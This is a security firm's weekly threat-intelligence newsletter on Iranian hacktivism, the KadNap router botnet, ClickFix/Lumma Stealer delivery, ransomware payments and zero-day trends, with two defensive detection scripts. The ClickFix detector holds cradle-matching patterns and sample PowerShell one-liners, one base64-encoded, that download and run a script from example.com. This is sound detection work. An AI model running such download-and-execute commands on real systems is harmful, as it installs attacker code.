IronCORE Recon Weekly

This Week's Overview

This week’s threat landscape reflects three converging trends shaping enterprise cyber risk: the weaponization of AI-assisted attack workflows, increased geopolitical cyber activity linked to Middle East tensions, and continued expansion of commodity malware ecosystems targeting endpoints and edge devices.

Operationally, adversaries are shifting away from noisy mass exploitation toward more resilient infrastructure and deception‑driven initial access techniques. Several campaigns observed this week demonstrate a move toward stealthier command‑and‑control models and socially engineered execution chains designed to bypass traditional endpoint protections. At the strategic level, geopolitical tensions continue to drive disruptive cyber activity by state‑aligned actors, while financially motivated groups continue to professionalize botnet and credential‑theft operations.

Security teams should prioritize monitoring of edge infrastructure, credential theft indicators, and abnormal endpoint command execution patterns. Additionally, organizations should assume increased experimentation by adversaries leveraging AI-assisted automation across reconnaissance and exploitation phases.

 

Key Articles & Threat Summaries

1. Iranian Cyber Group “Handala” Escalates Operations

Recent cyber operations attributed to the Iranian-linked group Handala highlight the growing role of hacktivist fronts as deniable instruments of state cyber activity. The group reportedly disrupted operations at a major medical technology company and continues targeting Israeli and Western interests amid regional tensions. WIRED

Why it Matters
Handala exemplifies a hybrid model combining hacktivism, psychological influence, and disruptive cyber operations. The activity aligns with broader patterns of Iranian cyber retaliation campaigns targeting critical infrastructure and technology sectors.

Key Takeaways

    • Likely ties to Iran’s Ministry of Intelligence operations.
    • Disruption-focused campaigns combined with propaganda amplification.
    • Potential targeting of medical, industrial, and surveillance infrastructure.

 

2. KadNap Router Botnet Expands via Edge Infrastructure

Researchers identified a growing botnet known as KadNap, which has compromised over 14,000 routers—many of them ASUS devices. The malware uses the Kademlia distributed hash table (DHT) protocol to conceal command‑and‑control infrastructure, making detection and takedown more difficult. IT Pro

Why it Matters
Edge devices continue to represent one of the weakest points in enterprise and small‑business networks: they sit outside endpoint telemetry and are patched irregularly. By embedding command infrastructure within a peer‑to‑peer overlay, attackers remove the single domain or IP that a takedown or sinkhole would normally target; every infected node can relay commands, so disrupting a few hosts does not sever control of the rest.

Key Takeaways

    • Over 14,000 infected routers globally.
    • C2 communication hidden within peer‑to‑peer network traffic.
    • Botnet access reportedly sold via proxy infrastructure for further attacks.
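A DHT-based C2 layer leaves a traffic shape that ordinary router egress does not: many distinct UDP peers on scattered high ports with small datagrams. The block below is an added example, written for this newsletter and not taken from the article or the cited research, that scores flow records for that shape. The subnet, thresholds and sample flows are constructed assumptions for illustration, not KadNap indicators.

```python
"""
Added example (not from the article or from the researchers it cites):
a flow-log heuristic for DHT-style peer-to-peer fan-out from edge devices.

A router that has joined a Kademlia-style overlay talks UDP to many distinct
peers on scattered high ports; a router doing ordinary egress talks to a
handful of resolvers, NTP servers and CDNs on a few well-known ports.
Thresholds, subnets and the sample flows below are constructed assumptions,
not KadNap indicators.
"""
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address, ip_network


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    proto: str   # "udp" or "tcp"
    dport: int
    nbytes: int  # bytes sent by src in this flow


def _build_sample_flows():
    """Constructed sample: three routers in 10.0.0.0/24 with different habits."""
    flows = []
    # 10.0.0.1 behaves like a DHT node: 40 distinct peers across three
    # documentation ranges, pseudo-random high ports, small datagrams.
    for i in range(40):
        prefix = ("198.51.100", "203.0.113", "192.0.2")[i % 3]
        flows.append(Flow("10.0.0.1", f"{prefix}.{i + 1}", "udp",
                          1024 + (i * 1543) % 60000, 120 + (i % 5) * 40))
    # 10.0.0.2 does normal egress: DNS, NTP and HTTPS to a few destinations.
    flows += [Flow("10.0.0.2", "8.8.8.8", "udp", 53, 90)] * 30
    flows += [Flow("10.0.0.2", "1.1.1.1", "udp", 53, 90)] * 5
    flows += [Flow("10.0.0.2", "129.6.15.28", "udp", 123, 76)] * 3
    flows += [Flow("10.0.0.2", "93.184.216.34", "tcp", 443, 1800)] * 12
    # 10.0.0.3 reaches many CDN nodes over QUIC: many peers, but one port.
    flows += [Flow("10.0.0.3", f"198.51.100.{200 + i}", "udp", 443, 1200)
              for i in range(30)]
    return flows


SAMPLE_FLOWS = _build_sample_flows()


def score_sources(flows, edge_nets, min_peers=25, min_ports=15, max_avg_bytes=600):
    """Return {src: stats} for edge sources whose UDP traffic looks like
    overlay maintenance: many distinct peers AND many distinct destination
    ports AND small datagrams. All three must hold, so a QUIC-heavy client
    (one port) or a large UDP transfer (big datagrams) is not flagged."""
    nets = [ip_network(n) for n in edge_nets]
    peers, ports, sizes = defaultdict(set), defaultdict(set), defaultdict(list)
    for f in flows:
        if f.proto != "udp" or not any(ip_address(f.src) in n for n in nets):
            continue
        peers[f.src].add(f.dst)
        ports[f.src].add(f.dport)
        sizes[f.src].append(f.nbytes)
    findings = {}
    for src in peers:
        avg = sum(sizes[src]) / len(sizes[src])
        if (len(peers[src]) >= min_peers and len(ports[src]) >= min_ports
                and avg <= max_avg_bytes):
            findings[src] = {"peers": len(peers[src]),
                             "ports": len(ports[src]),
                             "avg_bytes": round(avg)}
    return findings


if __name__ == "__main__":
    for src, stats in score_sources(SAMPLE_FLOWS, ["10.0.0.0/24"]).items():
        print(f"{src}: DHT-like fan-out {stats}")
```

Run against real NetFlow or firewall logs, the edge_nets list should hold the management or WAN addresses of routers and appliances, and the thresholds should be tuned against a baseline window before alerting; the three-way AND is what keeps QUIC-heavy clients and backup traffic out of the results.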

 

3. ClickFix Campaign Evolves with Windows Terminal Execution

Microsoft researchers report a new variant of ClickFix social engineering attacks that now instruct victims to execute malicious commands through Windows Terminal instead of the traditional Run dialog. The infection chain deploys the Lumma Stealer, a credential‑harvesting malware targeting browser data and cryptocurrency wallets. TechRadar

Why it Matters
The technique highlights the continuing evolution of user‑assisted malware execution. Because the victim types or pastes the command into a legitimate, signed system utility, there is no malicious attachment, macro, or exploit for automated controls to catch; the first suspicious artifact is a shell spawned from an interactive session, which many detection rules deliberately ignore as normal administrative activity.

Key Takeaways

    • Social engineering used to trigger command‑line execution.
    • Payload typically installs Lumma credential‑stealing malware.
    • Targets browser credentials, cookies, and cryptocurrency wallets.
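The detectable moment in a ClickFix chain is an interactive launcher spawning a shell whose command line carries a download-and-execute cradle. The block below is an added example, written for this newsletter and not taken from Microsoft's report or from the article, that applies that rule to process-creation events, including decoding -EncodedCommand payloads so the pattern match sees the real script. The field names follow Sysmon event 1; the events, paths and URLs are constructed for illustration, not campaign indicators.

```python
"""
Added example (not from the article or from Microsoft's report): a
process-creation detection for ClickFix-style user-executed command chains.

The signal is an interactive launcher (Windows Terminal, or explorer.exe for
the Run-dialog variant) spawning a shell whose command line carries a
download-and-execute cradle. EncodedCommand payloads are decoded so the
pattern match sees the real script. Event fields follow the Sysmon event 1
field names; the events, paths and URLs below are constructed, not IOCs.
"""
import base64
import re

INTERACTIVE_PARENTS = {"windowsterminal.exe", "explorer.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Each pattern is a download/execute primitive or a "hide the window" flag
# that a user pasting a "fix" would not normally type by hand.
CRADLE_PATTERNS = {
    "web_cradle":    r"\b(iwr|irm|iex|invoke-webrequest|invoke-restmethod|invoke-expression)\b",
    "net_download":  r"downloadstring|downloadfile",
    "base64_blob":   r"frombase64string",
    "clipboard":     r"get-clipboard",
    "mshta_url":     r"mshta\s+https?://",
    "curl_pipe":     r"curl\s+[^|]*\|\s*(cmd|powershell|sh)\b",
    "hidden_window": r"-w(?:indowstyle)?\s+hidden",
}
_ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or None."""
    m = _ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the matched pattern names for one process-creation event."""
    if _basename(event["ParentImage"]) not in INTERACTIVE_PARENTS:
        return []
    if _basename(event["Image"]) not in SHELLS:
        return []
    text = event["CommandLine"]
    decoded = decode_encoded_command(text)
    if decoded:
        text = f"{text} {decoded}"   # match on the decoded script as well
    return [name for name, pat in CRADLE_PATTERNS.items() if re.search(pat, text, re.I)]


def scan(events):
    """Return [(index, matches)] for events that look like ClickFix execution."""
    return [(i, classify(ev)) for i, ev in enumerate(events) if classify(ev)]


# Constructed sample events (Sysmon-style field names, hypothetical content;
# the Windows Terminal path is simplified from the real packaged-app path).
_TERMINAL = r"C:\Program Files\WindowsApps\WindowsTerminal.exe"
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_ENC_SCRIPT = "iex (iwr http://example.com/p -UseBasicParsing)"
SAMPLE_EVENTS = [
    {   # Windows Terminal variant: pasted one-liner with a web cradle
        "ParentImage": _TERMINAL, "Image": _PS,
        "CommandLine": 'powershell -w hidden -c "iex (irm https://example.com/verify)"',
    },
    {   # Run-dialog variant: explorer.exe parent, payload hidden in -enc
        "ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
        "CommandLine": "powershell -nop -enc "
        + base64.b64encode(_ENC_SCRIPT.encode("utf-16-le")).decode(),
    },
    {   # Benign admin use of the same shell from the same terminal
        "ParentImage": _TERMINAL, "Image": _PS,
        "CommandLine": "powershell Get-ChildItem C:\\Users | Measure-Object",
    },
    {   # Same cradle from a service parent: out of scope for this rule
        "ParentImage": r"C:\Windows\System32\svchost.exe", "Image": _PS,
        "CommandLine": "powershell -c iwr https://example.com/agent.ps1",
    },
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

Scoping the rule to interactive parents keeps it quiet on scheduled tasks and management agents that legitimately download scripts; those belong in a separate rule with its own baseline. The decode step matters because -EncodedCommand is the cheapest way for a pasted one-liner to hide its cradle from a plain string match.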

 

4. Surge in Ransomware Payments Signals Persistent Criminal Leverage

Recent industry data shows that 24.3% of organizations paid ransomware demands in 2025, a significant increase from the prior year. The shift is attributed partly to AI‑assisted targeting that allows attackers to identify high‑value data and operational pressure points. The Times

Why it Matters
The increase suggests ransomware operators are refining their targeting rather than expanding attack volume. Operational disruption—especially in manufacturing and industrial sectors—continues to drive payment decisions.

Key Takeaways

    • Average ransom payments approaching $296K.
    • Operational disruption remains the strongest pressure tactic.
    • AI increasingly used to tailor victim targeting.

 

5. Zero‑Day Exploitation Shifts Toward Enterprise Platforms

Security research indicates 90 zero‑day vulnerabilities were exploited in the wild in 2025, with nearly half targeting enterprise infrastructure rather than browsers. Attackers are focusing on operating systems, networking devices, and security appliances for persistent access. TechRadar, IT Pro

Why it Matters
This shift reflects adversaries prioritizing footholds that provide broad network visibility and long‑term persistence rather than opportunistic browser exploits.

Key Takeaways

    • Enterprise technologies represented nearly half of exploited zero‑days.
    • Security appliances and networking gear increasingly targeted.
    • Both nation‑state and commercial surveillance actors active.

 

Strategic Implications for Security Leaders

1. Edge Infrastructure Is the New Initial Access Layer

Routers, VPN gateways, and security appliances are becoming primary entry points: they hold privileged positions on the network perimeter, typically run without endpoint telemetry or EDR coverage, and are patched far less consistently than user workstations.

2. Social Engineering + Legitimate Tools = Reliable Malware Delivery

Campaigns increasingly rely on user‑executed commands rather than exploit kits, reducing their dependence on exploitable vulnerabilities; a fully patched host remains exposed if the user can be talked into running the command.

3. Geopolitical Tensions Are Driving Cyber Activity

Nation‑state aligned groups are expanding disruptive cyber operations alongside conventional conflict.

4. AI Is Accelerating Both Offensive and Defensive Cycles

Attackers are using automation to improve reconnaissance, targeting, and exploit development, forcing defenders to adopt proactive detection and resilience strategies.

 

For immediate assistance with a network intrusion, ransomware attack, or BEC, please contact: IrongateResponse@irongatesecurity.com
